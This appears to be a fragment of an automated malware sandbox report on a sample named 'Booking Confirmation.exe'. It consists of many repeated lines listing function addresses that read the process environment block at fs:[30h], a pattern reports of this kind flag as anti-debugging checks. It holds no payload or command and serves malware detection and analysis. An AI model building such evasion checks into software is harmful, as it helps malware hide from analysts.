Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]		5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E51BE mov eax, dword ptr fs:[00000030h]		5_2_018E51BE
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018F41E8 mov eax, dword ptr fs:[00000030h]		5_2_018F41E8
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B1E1 mov eax, dword ptr fs:[00000030h]		5_2_0186B1E1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]		5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]		5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869100 mov eax, dword ptr fs:[00000030h]		5_2_01869100
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov eax, dword ptr fs:[00000030h]		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01884120 mov ecx, dword ptr fs:[00000030h]		5_2_01884120
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]		5_2_0189513A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189513A mov eax, dword ptr fs:[00000030h]		5_2_0189513A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]		5_2_0188B944
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188B944 mov eax, dword ptr fs:[00000030h]		5_2_0188B944
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C962 mov eax, dword ptr fs:[00000030h]		5_2_0186C962
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]		5_2_0186B171
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186B171 mov eax, dword ptr fs:[00000030h]		5_2_0186B171
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869080 mov eax, dword ptr fs:[00000030h]		5_2_01869080
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]		5_2_018E3884
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3884 mov eax, dword ptr fs:[00000030h]		5_2_018E3884
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A90AF mov eax, dword ptr fs:[00000030h]		5_2_018A90AF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018920A0 mov eax, dword ptr fs:[00000030h]		5_2_018920A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov ecx, dword ptr fs:[00000030h]		5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]		5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189F0BF mov eax, dword ptr fs:[00000030h]		5_2_0189F0BF
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov ecx, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FB8D0 mov eax, dword ptr fs:[00000030h]		5_2_018FB8D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018658EC mov eax, dword ptr fs:[00000030h]		5_2_018658EC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]		5_2_01934015
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]		5_2_01934015
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]		5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]		5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]		5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]		5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]		5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]		5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]		5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]		5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]		5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]		5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]		5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]		5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]		5_2_01880050
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]		5_2_01880050
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01922073 mov eax, dword ptr fs:[00000030h]		5_2_01922073
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931074 mov eax, dword ptr fs:[00000030h]		5_2_01931074
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]		5_2_01871B8F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]		5_2_01871B8F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191D380 mov ecx, dword ptr fs:[00000030h]		5_2_0191D380
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192138A mov eax, dword ptr fs:[00000030h]		5_2_0192138A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189B390 mov eax, dword ptr fs:[00000030h]		5_2_0189B390
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892397 mov eax, dword ptr fs:[00000030h]		5_2_01892397
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]		5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]		5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]		5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01935BA5 mov eax, dword ptr fs:[00000030h]		5_2_01935BA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]		5_2_018E53CA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]		5_2_018E53CA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188DBE9 mov eax, dword ptr fs:[00000030h]		5_2_0188DBE9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]		5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192131B mov eax, dword ptr fs:[00000030h]		5_2_0192131B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186DB40 mov eax, dword ptr fs:[00000030h]		5_2_0186DB40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938B58 mov eax, dword ptr fs:[00000030h]		5_2_01938B58
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186F358 mov eax, dword ptr fs:[00000030h]		5_2_0186F358
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186DB60 mov ecx, dword ptr fs:[00000030h]		5_2_0186DB60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]		5_2_01893B7A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]		5_2_01893B7A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]		5_2_0189D294
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]		5_2_0189D294
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]		5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]		5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]		5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]		5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]		5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]		5_2_0187AAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]		5_2_0187AAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FAB0 mov eax, dword ptr fs:[00000030h]		5_2_0189FAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892ACB mov eax, dword ptr fs:[00000030h]		5_2_01892ACB
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892AE4 mov eax, dword ptr fs:[00000030h]		5_2_01892AE4
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]		5_2_0192AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]		5_2_0192AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01878A0A mov eax, dword ptr fs:[00000030h]		5_2_01878A0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]		5_2_0186AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]		5_2_0186AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01883A1C mov eax, dword ptr fs:[00000030h]		5_2_01883A1C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]		5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov ecx, dword ptr fs:[00000030h]		5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]		5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]		5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]		5_2_018A4A2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]		5_2_018A4A2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]		5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]		5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]		5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]		5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192EA55 mov eax, dword ptr fs:[00000030h]		5_2_0192EA55
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018F4257 mov eax, dword ptr fs:[00000030h]		5_2_018F4257
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A927A mov eax, dword ptr fs:[00000030h]		5_2_018A927A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]		5_2_0191B260
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]		5_2_0191B260
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938A62 mov eax, dword ptr fs:[00000030h]		5_2_01938A62
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]		5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]		5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]		5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]		5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]		5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]		5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]		5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]		5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]		5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]		5_2_0189FD9B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]		5_2_0189FD9B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018935A1 mov eax, dword ptr fs:[00000030h]		5_2_018935A1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]		5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]		5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]		5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]		5_2_019305AC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]		5_2_019305AC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov ecx, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]		5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01918DF1 mov eax, dword ptr fs:[00000030h]		5_2_01918DF1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]		5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]		5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938D34 mov eax, dword ptr fs:[00000030h]		5_2_01938D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192E539 mov eax, dword ptr fs:[00000030h]		5_2_0192E539
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]		5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]		5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]		5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]		5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AD30 mov eax, dword ptr fs:[00000030h]		5_2_0186AD30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018EA537 mov eax, dword ptr fs:[00000030h]		5_2_018EA537
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A3D43 mov eax, dword ptr fs:[00000030h]		5_2_018A3D43
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3540 mov eax, dword ptr fs:[00000030h]		5_2_018E3540
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01887D50 mov eax, dword ptr fs:[00000030h]		5_2_01887D50
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]		5_2_0188C577
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]		5_2_0188C577
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187849B mov eax, dword ptr fs:[00000030h]		5_2_0187849B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938CD6 mov eax, dword ptr fs:[00000030h]		5_2_01938CD6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019214FB mov eax, dword ptr fs:[00000030h]		5_2_019214FB
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]		5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]		5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]		5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]		5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]		5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]		5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]		5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]		5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]		5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]		5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]		5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189BC2C mov eax, dword ptr fs:[00000030h]		5_2_0189BC2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A44B mov eax, dword ptr fs:[00000030h]		5_2_0189A44B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]		5_2_018FC450
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]		5_2_018FC450
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188746D mov eax, dword ptr fs:[00000030h]		5_2_0188746D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01878794 mov eax, dword ptr fs:[00000030h]		5_2_01878794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]		5_2_018E7794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]		5_2_018E7794
